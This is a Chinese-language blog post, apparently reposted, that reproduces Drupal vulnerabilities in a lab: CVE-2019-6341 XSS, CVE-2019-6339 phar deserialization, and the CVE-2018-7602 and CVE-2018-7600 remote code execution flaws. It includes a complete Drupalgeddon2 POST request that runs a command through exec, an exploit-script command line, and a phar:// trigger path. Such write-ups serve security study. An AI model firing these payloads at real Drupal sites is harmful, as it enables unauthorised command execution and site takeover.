Drupal CMS 相關漏洞復現


Drupal XSS漏洞(CVE-2019-6341)

 影響軟件:Drupal
 方式:通過文件模塊或者子系統上傳惡意文件觸發XSS漏洞
 參考鏈接:[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/)
 效果:JS代碼執行(Cookies 資料竊取、會話劫持、釣魚欺騙、網頁掛馬等)

影響版本

在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。

實驗環境

drupal 8.5.0

 

復現

 

 

 

 

1.使用PoC上傳構造好的偽造GIF文件,PoC參考[thezdi/PoC](https://github.com/thezdi/PoC/tree/master/Drupal)的PoC。  

 

 

 

 

 

2.訪問目標站點 

 

#Drupal 的圖片默認存儲位置為 `/sites/default/files/pictures/<YYYY-MM>/`,默認存儲名稱為其原來的名稱,所以之后在利用漏洞時,可以知道上傳后的圖片的具體位置。

 

訪問 http://45.77.127.27:8080/sites/default/files/pictures/2021-05/_0  成功觸發xss

 

 

感覺么啥用啊,火狐和谷歌都攔截這個XSS,IE才能看到

 

 

 

Drupal 遠程代碼執行漏洞(CVE-2019-6339)

影響軟件:Drupal
方式:phar反序列化RCE
參考鏈接:[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/)
效果:任意命令執行

這個漏洞得要管理員賬號登后台

 

實驗環境

同上

 

1.先使用管理員用戶上傳頭像,頭像圖片為構造好的 PoC,和上面實現一個github下載的gif

 

 

Drupal 的圖片默認存儲位置為 `/sites/default/files/pictures/<YYYY-MM>/`,默認存儲名稱為其原來的名稱,所以之后在利用漏洞時,可以知道上傳后的圖片的具體位置。

 

 

 

 

 2.訪問 `http://127.0.0.1:8080/admin/config/media/file-system`,在 `Temporary directory(臨時目錄)` 處輸入之前上傳的圖片路徑,示例為 `phar://./sites/default/files/pictures/2019-06/blog-ZDI-CAN-7232-cat_0.jpg`,保存后將觸發該漏洞

phar://./sites/default/files/pictures/2021-05/blog-ZDI-CAN-7232-cat.jpg

 

 

 

 

 

 

Drupal 遠程代碼執行漏洞(CVE-2018-7602)

影響軟件:drupal
方式:對URL中的#進行編碼兩次,繞過sanitize()函數過濾
效果:任意命令執行
條件:知道賬號密碼

實驗環境

drupal 7.57

 

 

 

 

復現

 

1.整點腳本

 

https://github.com/pimps/CVE-2018-7600

 

 

 

2.用腳本

 

```bash
# "id"為要執行的命令 第一個drupal為用戶名 第二個drupal為密碼
python3 drupa7-CVE-2018-7602.py -c "id" drupal drupal http://127.0.0.1:8081/
```

 

 

沒有腳本這日子怎么過啊,什么時候能寫出自己的腳本發github上

 


Drupal 遠程代碼執行漏洞(CVE-2018-7600)

其6/7/8版本的Form API中存在一處遠程代碼執行漏洞

實驗環境

drupal 8.5.0

 

復現

我們向安裝完成的drupal發送如下數據包:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

 

當然版本小於7.57的版本我們也可以用腳本

 

 

Drupal相關漏洞還有

CVE-2017-6920  -- 8.x的Drupal Core--遠程代碼執行,這是Drupal Core的YAML解析器處理不當所導致的一個遠程代碼執行漏洞,影響8.x的Drupal Core   #需要管理員賬號密碼

CVE-2014-3704 -- Drupal < 7.32 -- SQL注入

這里就不復現了,遇到了再來折騰

 

 

 

 


 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM